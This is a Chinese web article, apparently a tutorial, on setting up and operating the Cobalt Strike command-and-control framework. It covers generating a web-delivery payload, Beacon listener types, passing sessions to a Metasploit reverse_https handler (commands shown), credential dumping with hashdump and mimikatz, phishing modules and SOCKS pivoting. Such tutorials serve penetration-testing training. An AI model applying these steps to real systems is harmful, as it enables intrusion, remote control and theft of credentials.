当前位置:首页 > CN2资讯 > 正文内容

java Cobalt Strike java中文版下载

3天前CN2资讯


Cobalt Strike

安装JAVA环境

1.下载java1.8

地址:

https://www.oracle.com/java/technologies/javase/javase8u211-later-archive-downloads.html

2.安装

在自己选取的VPS或者其他地方安装

3.配置环境变量

4.查看结果

查看java安装是否完毕(如何下即成功。)

输入:java -version

Cobalt Strike

1.运行

Windows使用命令:teamserver IP 密码

2.客户端连接

主机:服务端的地址

端口:CS开启的端口,一般都是默认的50050(可更改)

用户名:可自定义(不要与其他的冲突)

密码:在启动CS团队服务器的时间输入的密码

3.坑点:连接超时。

  • 要注意端口是否开启
  • 防火墙是否放行端口。
  • 每次创建新的CS服务器时,都会验证一个指纹并且每次都不一样。作用是为了防篡改。
  • 4.CS页面介绍

    5.建立第一个监听

    1.打开Listen(可通过菜单栏和快捷栏打开)

    2.添加一个新的监听器

    3.攻击

    点击菜单栏Attacks,使用Web Drive-by中的Script Web Delivery。

    注意:生成payload的端口与监听器的端口不可重复否则就会冲突。

    4.执行

    点击开始,复制payload,放到cmd里面执行。

    5.上线成功

    对上线的主机进行右键,进入Beacon,在里面可以输入相应的命令进行查看操作等。

    注意:1.输入shell命令时,要在命令前面加shell。如:shell whoami

    2.Beacon每次回连的时间默认为60秒,可修改(sleep 0 回连时间0,建议不要太快不然流量会很明显)。

    CS模块详解

    Cobalt strike

    New Connection:新建连接。

    Preferences:偏好设置,首选项,设置主界面、控制台、Teamserver连接记录、报告的样式。

    Visualization:可视化页面,将主机以不同的权限展示出来。

    VPN interfaces:设置VPN的接口。

    Listeners:创建监听器。

    Script Manager:查看和加载CNA脚本

    Close:关闭

    View(视图)模块

    Applications:显示被控机器的应用信息。

    Credentials:凭证信息,通过HashDump或mimikatz获取的密码或散列值都储存在这里。

    Downloads:文件下载,从被控制的机器中。

    Event Log:日志,主机上线记录,团队聊天记录和操作记录。

    Keystrokes:键盘记录。

    Proxy Pivots:代理

    Screenshots:屏幕截图。

    Script Console:脚本控制台,可加载各种脚本。

    Targets:查看目标。

    Web Logs:web日志。

    Attacks(攻击)模块

    Packages(后门)模块

    HTML Application:基于HTML应用的payload模块,通过HTML调用其他语言的应用组件进行攻击,提供可执行文件、Powershell、VBA三种方法。

    MS Office Macro:生成基于Office病毒的payload。

    Payload Generator:Payload生成器,可以生成基于C、C#、COM Script、Java、Perl、Poweshell、Python、Ruby、VBA等的payload。

    Windows Ececutable:可生成32位和64位的EXE和基于服务的EXE、DLL等后门。在32位Windows系统中无法执行64位的payload,而且对于后渗透的相关模块,使用32位和64位的payload会产生不同的影响。

    Windows Ececutable(S):用于生成一个exe可执行文件,其中包含Beacon的完整payload,不需要阶段性的请求。与Windows Executable模块相比,该模块额外提供了代理设置,以便在较为苛刻的环境中进行渗透测试。该模块还支持powershell脚本,可用于将Stageless Payload注入内存。

    Web Drive-by(钓鱼攻击)模块

    Manage:管理器,对开启的web服务进行管理

    Clone Site:克隆网站,可以记录受害者提交的数据

    Host File:将指定文件加载到web中,支持修改Mime Type。

    Scripted Web Delivery:基于web的攻击测试脚本,可自动生成payload,类似于Metasploit的web_delivery

    Signed Applet Attack:使用java自签名的程序进行钓鱼攻击(该方法已过时)

    Smart Applet Attack:自动检测java版本并进行攻击,针对Java 1.6.0_45以下以及Java 1.7.0_21以下版本(该方法已过时)

    System Profiler:客户端检测工具,用来获取系统信息,如系统版本,Flash版本,浏览器版本等

    Reporting(报告)模块

    可配合CS的操作记录、结果等,直接生成相关报告。

    CS功能详解

    监听(Listeners)模块payload详解

    包含了DNS、HTTP、HTTPS、SMB、TCP、External C2、Foreign HTTP、Foreign HTTPS。

    DNS Beacon:

    采用DNS的方式对目标主机进行管理。在CS4.0版本后,DNS Beacon 是一个仅 DNS 的 payload, DNS Beacon 可以通过 DNS TXT 记录、DNS AAAA 记录或 DNS A 记录下载任务。背后的原理其实也是很简单,域名解析服务器记录它指定该域名由哪个DNS服务器来进行解析而我们把它指向xxx.xxx也就是我们的CS服务器,这样每次查询xxx1.xxx.xxx,最后都会来和我们的CS服务器进行通信。注意:Beacon DNS payload上线后是不会显示目标信息的。

    HTTP与HTTPS Beacon:

    HTTP和HTTPS基本上没有太大的区别,监听器配置选项都是一样的,只是HTTPS会多一个SSL证书配置,有较高得隐蔽性。HTTP与HTTPS Beacon通过 HTTP GET 请求来下载任务。这些 Beacon 通过 HTTP POST 请求传回数据。

    SMB Beacon:

    使用命名管道通过一个父 Beacon 进行通信。仅需配置一项Pipename(C2)也就是命名管道的名字。注意: 1.因为是将命名管道封装到SMB协议中,进行通信所以目标至少得能进行SMB协议通信开启SMB服务(必须接受445端口上得连接)2.因为是使用SMB协议,所以还需要注意一下访问权限否则可能无法连接对方(必须有目标主机的管理员组的权限或者说是拥有具有管理员组权限的凭据)。

    TCP Beacon:

    与SMB Beacon类似只不过TCP Beacon不是使用SMB与父Beacon进行通信而是使用TCP socket进行通信。Bind to localhost only选项是来配置TCP Beacon监听绑定地址的,如果勾选上则仅绑定127.0.0.1本地ip,默认不勾选绑定在0.0.0.0,如果只绑定127.0.0.1那么只能进行本地连接,远程主机是无法访问的,0.0.0.0是监听所有地址(注:监听绑定非127.0.0.1 windows防火墙会有提示,远程主机不要勾选。)

    External C2:

    外部C2,是一种特殊的监听器。

    Foreign HTTP和Foreign HTTPS:

    对外监听器,这两种并没有什么太大的区别他们的关系和Beacon HTTP(S)基本上差不多,这两种监听器一般用来派生会话到Metasploit或Empire。

    利用CS反弹shell(派生)

    首先创建一个新的msf外置监听器,HTTPS Host写上msf IP,HTTPS Port写上msf监听端口。

    启动msf监听

    msf > use exploit/multi/handler msf exploit(handler) > set payload windows/meterpreter/reverse_https payload => windows/meterpreter/reverse_https msf exploit(handler) > set lhost msf ip lhost => msf ip msf exploit(handler) > set lport 8888 lport => 8888 msf exploit(handler) > exploit

    对已上线的主机右键,增加会话,并选择创建的msf外置监听器,msf即可接收到会话。(注意:派生时候,msf选择payload注意一下架构(x86),在控制台输入“spawn msf”也可。)

    [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-na2njMdB-1638283929679)(file:///C:/Users/cola/AppData/Local/Temp/msohtmlclip1/01/clip_image044.jpg)]

    后渗透模块:

    转储Hash:

    beacon中输入hashdump,beacon会话框输出了目标机的用户名和密码hash值。

    Run Mimikatz(导出凭证):

    在beacon中执行logonpasswords命令当会话为管理员权限时,才能dump成功,如果权限很低,请先提权。通过视图模块的凭证信息,即可查看之前dump过的凭据信息。(注意:如果操作系统更新了KB2871997补丁或者版本高于Windows Server2012,就无法在默认情况下抓取明文。)

    SOCKS Server:

    简单来说就是把本机和目标机器通过Socks协议开启一个安全不受防火墙拦截的通道。

    通过其他工具的proxy插件,并设定socks代理(代理的地址为teamserver的IP地址,端口为cs中显示的端口),配置完成以后,便可以通过受控机跳转到其内网。

    Beacon常用命令:

    Getuid:获取当前beacon是使用哪个用户身份运行的、是否有管理员权限等。

    Getsystem:尝试获取system权限。

    Getprivs:获取当前beacon包含的所有权限。

      你可能想看:

      扫描二维码推送至手机访问。

      版权声明:本文由皇冠云发布,如需转载请注明出处。

      本文链接:https://www.idchg.com/info/19159.html

      分享给朋友:

      “java Cobalt Strike java中文版下载” 的相关文章

      搬瓦工官网:高性价比VPS服务及购买指南

      当我第一次了解到搬瓦工(BandwagonHost),它是一家专注于VPS服务的公司,并隶属于加拿大IT7 Networks公司。这让我对搬瓦工的专业性和服务质量更加期待。这个名字在VPS领域已经有了一定的影响力,尤其是在追求高性价比的用户群体中。 搬瓦工官网有多个域名,比如bandwagonhos...

      eno VPS:掌握网络接口命名规则与性能优化技巧

      在了解eno VPS之前,我们先来看看什么是eno命名规则。ena作为一种网络接口命名方式,通过特定的规则来表示Linux系统中的网络设备。这种规则帮助用户更容易地识别和管理各种网络接口。具体来说,eno采用的是eno[n|d]的格式,主要用于板载设备。而对于热插拔设备,则使用ens[f][n|d]...

      续费同价服务器:云服务的透明定价策略与用户优势

      续费同价服务器是什么呢?说白了,就是云服务提供商在定价上采取的一种政策。无论是新用户第一次购买,还是老用户续费,价格都是一样的。这种做法让很多用户感到安心,不用担心下次续费时价格会大幅上涨。这一策略在云服务行业越来越受到重视,也给用户带来了不少好处。 首先,续费同价服务器让价格变得透明。我之前在选择...

      全球云服务厂商排名分析:选择适合你的云服务平台

      在如今这个数字化快速发展的时代,云服务已经成为企业运营的核心。全球云服务市场正在以前所未有的速度增长,吸引了众多企业选择不同的云服务提供商。作为用户,当我们谈论云服务厂商时,不可避免地会提到几个行业巨头,显然,他们的市场份额和影响力在整个行业中是不可忽视的。 近年以来,亚马逊网络服务(AWS)稳居全...

      亿速云:构建安全、高效的云计算解决方案

      在当今数字化快速发展的时代,云计算服务的重要性愈发显著。我了解到,亿速云正是一家在这一领域崭露头角的企业,专注于提供高品质的云计算服务。自成立以来,亿速云围绕创新技术和卓越服务,努力帮助各行各业的用户实现数字化转型和升级。作为新一代云计算服务商,亿速云把握时代脉搏,致力于为全球用户提供稳定、安全、高...

      RackNerd在纽约的数据中心服务与优势

      RackNerd在纽约的数据中心的服务确实引人关注。从基础服务到多样化的产品,RackNerd为各类客户提供了丰富的选择。我对于他们的虚拟主机和独立服务器十分赞赏。这些服务不仅安全可靠,而且具有灵活的配置选项,满足了各种不同需求的用户。对于初创企业或者需要特别高可用性的业务,选择RackNerd无疑...